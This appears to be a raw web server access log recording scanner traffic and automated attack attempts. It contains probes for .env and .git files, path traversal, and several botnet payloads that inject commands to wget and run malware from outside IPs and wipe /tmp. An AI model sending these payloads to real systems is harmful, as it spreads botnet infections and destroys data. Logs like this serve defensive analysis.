185.142.236.43 - - [04/Mar/2023:01:24:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
164.92.255.240 - - [04/Mar/2023:01:25:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.92.255.240 - - [04/Mar/2023:01:25:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.92.255.240 - - [04/Mar/2023:01:25:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.255.240 - - [04/Mar/2023:01:25:36 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.253.13.248 - - [04/Mar/2023:01:36:57 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
170.253.13.248 - - [04/Mar/2023:01:36:57 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:01:46:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
128.14.134.170 - - [04/Mar/2023:01:51:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [04/Mar/2023:01:51:52 +0100] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [04/Mar/2023:01:51:53 +0100] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [04/Mar/2023:01:51:53 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.170 - - [04/Mar/2023:01:51:53 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:01:56:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.72.206.95 - - [04/Mar/2023:01:57:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
179.43.177.242 - - [04/Mar/2023:02:00:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
206.226.64.150 - - [04/Mar/2023:02:01:59 +0100] "GET /cgi-bin/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.226.64.150 - - [04/Mar/2023:02:02:01 +0100] "POST /cgi-bin HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:02:04:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.76.96.55 - - [04/Mar/2023:02:05:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
198.235.24.154 - - [04/Mar/2023:02:06:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.199.93.20 - - [04/Mar/2023:02:06:42 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:07:54 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:08:05 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:08:23 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:08:23 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:08:26 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:08:59 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
198.199.93.20 - - [04/Mar/2023:02:09:57 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
193.32.162.159 - - [04/Mar/2023:02:10:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.199.93.20 - - [04/Mar/2023:02:10:14 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
179.43.177.242 - - [04/Mar/2023:02:11:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
179.43.177.242 - - [04/Mar/2023:02:13:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
34.76.158.233 - - [04/Mar/2023:02:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
47.88.78.6 - - [04/Mar/2023:02:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.90.156 - - [04/Mar/2023:02:16:31 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.87.97 - - [04/Mar/2023:02:16:32 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
20.163.14.232 - - [04/Mar/2023:02:18:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:02 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:02 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:02 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:03 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:03 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:02:18:03 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.32.162.159 - - [04/Mar/2023:02:19:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.140.248.32 - - [04/Mar/2023:02:21:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
34.78.6.216 - - [04/Mar/2023:02:21:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
14.241.106.223 - - [04/Mar/2023:02:22:24 +0100] "GET /cgi-bin/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
14.241.106.223 - - [04/Mar/2023:02:22:25 +0100] "POST /cgi-bin HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
60.221.224.111 - - [04/Mar/2023:02:23:20 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
179.43.177.242 - - [04/Mar/2023:02:28:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
34.78.6.216 - - [04/Mar/2023:02:29:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
179.43.177.242 - - [04/Mar/2023:02:29:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
179.43.177.242 - - [04/Mar/2023:02:30:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.142.236.41 - - [04/Mar/2023:02:31:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [04/Mar/2023:02:31:25 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [04/Mar/2023:02:31:25 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.41 - - [04/Mar/2023:02:31:26 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [04/Mar/2023:02:31:27 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
205.210.31.165 - - [04/Mar/2023:02:33:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
111.118.40.97 - - [04/Mar/2023:02:38:34 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
179.43.177.242 - - [04/Mar/2023:02:39:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
92.118.39.82 - - [04/Mar/2023:02:45:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [04/Mar/2023:02:45:48 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
179.43.177.242 - - [04/Mar/2023:02:45:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
109.237.98.226 - - [04/Mar/2023:02:47:18 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [04/Mar/2023:02:47:18 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
139.0.22.6 - - [04/Mar/2023:02:48:24 +0100] "GET http://212.91.246.88:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
139.0.22.6 - - [04/Mar/2023:02:48:24 +0100] "GET http://212.91.246.88:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
92.118.39.82 - - [04/Mar/2023:02:49:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [04/Mar/2023:02:49:31 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
92.118.39.82 - - [04/Mar/2023:02:50:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [04/Mar/2023:02:50:08 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
51.158.37.156 - - [04/Mar/2023:02:50:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:02:50:34 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
51.158.37.156 - - [04/Mar/2023:02:50:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:02:50:58 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
69.244.154.231 - - [04/Mar/2023:02:52:47 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [04/Mar/2023:02:52:47 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.164.130.215 - - [04/Mar/2023:02:53:38 +0100] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
183.136.225.32 - - [04/Mar/2023:02:54:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
69.244.154.231 - - [04/Mar/2023:02:54:00 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [04/Mar/2023:02:54:01 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [04/Mar/2023:02:54:49 +0100] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [04/Mar/2023:02:54:50 +0100] "POST /download HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
183.136.225.32 - - [04/Mar/2023:02:59:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Mar/2023:02:59:23 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Mar/2023:02:59:23 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
193.32.162.159 - - [04/Mar/2023:03:03:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
183.136.225.32 - - [04/Mar/2023:03:04:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
192.241.196.56 - - [04/Mar/2023:03:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:09:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:09:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:09:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
183.136.225.32 - - [04/Mar/2023:03:09:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Mar/2023:03:09:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Mar/2023:03:09:42 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
192.241.196.56 - - [04/Mar/2023:03:09:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:11:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.6 - - [04/Mar/2023:03:11:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
202.73.34.226 - - [04/Mar/2023:03:11:13 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [04/Mar/2023:03:11:14 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.43 - - [04/Mar/2023:03:11:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.241.196.56 - - [04/Mar/2023:03:11:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
111.118.40.97 - - [04/Mar/2023:03:12:09 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
192.241.196.56 - - [04/Mar/2023:03:12:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:12:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.196.56 - - [04/Mar/2023:03:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
202.73.34.226 - - [04/Mar/2023:03:13:21 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [04/Mar/2023:03:13:22 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [04/Mar/2023:03:14:51 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [04/Mar/2023:03:14:52 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:03:17:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
186.211.1.7 - - [04/Mar/2023:03:19:51 +0100] "\x16\x03\x01\x01\xaa\x01" 501 321 "-" "-"
51.158.37.156 - - [04/Mar/2023:03:22:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:03:22:43 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.32.162.159 - - [04/Mar/2023:03:23:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [04/Mar/2023:03:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.61 - - [04/Mar/2023:03:28:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.61 - - [04/Mar/2023:03:28:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.61 - - [04/Mar/2023:03:28:36 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.61 - - [04/Mar/2023:03:28:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
109.111.155.12 - - [04/Mar/2023:03:29:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
193.32.162.159 - - [04/Mar/2023:03:31:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.98.183.42 - - [04/Mar/2023:03:35:46 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
198.98.183.42 - - [04/Mar/2023:03:35:47 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:03:39:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
59.187.205.166 - - [04/Mar/2023:03:41:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
51.158.37.156 - - [04/Mar/2023:03:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:03:41:41 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
141.193.195.165 - - [04/Mar/2023:03:44:09 +0100] "GET /shared/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:03:44:10 +0100] "POST /shared HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.163.14.232 - - [04/Mar/2023:03:49:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:03:49:09 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
20.163.14.232 - - [04/Mar/2023:03:49:09 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
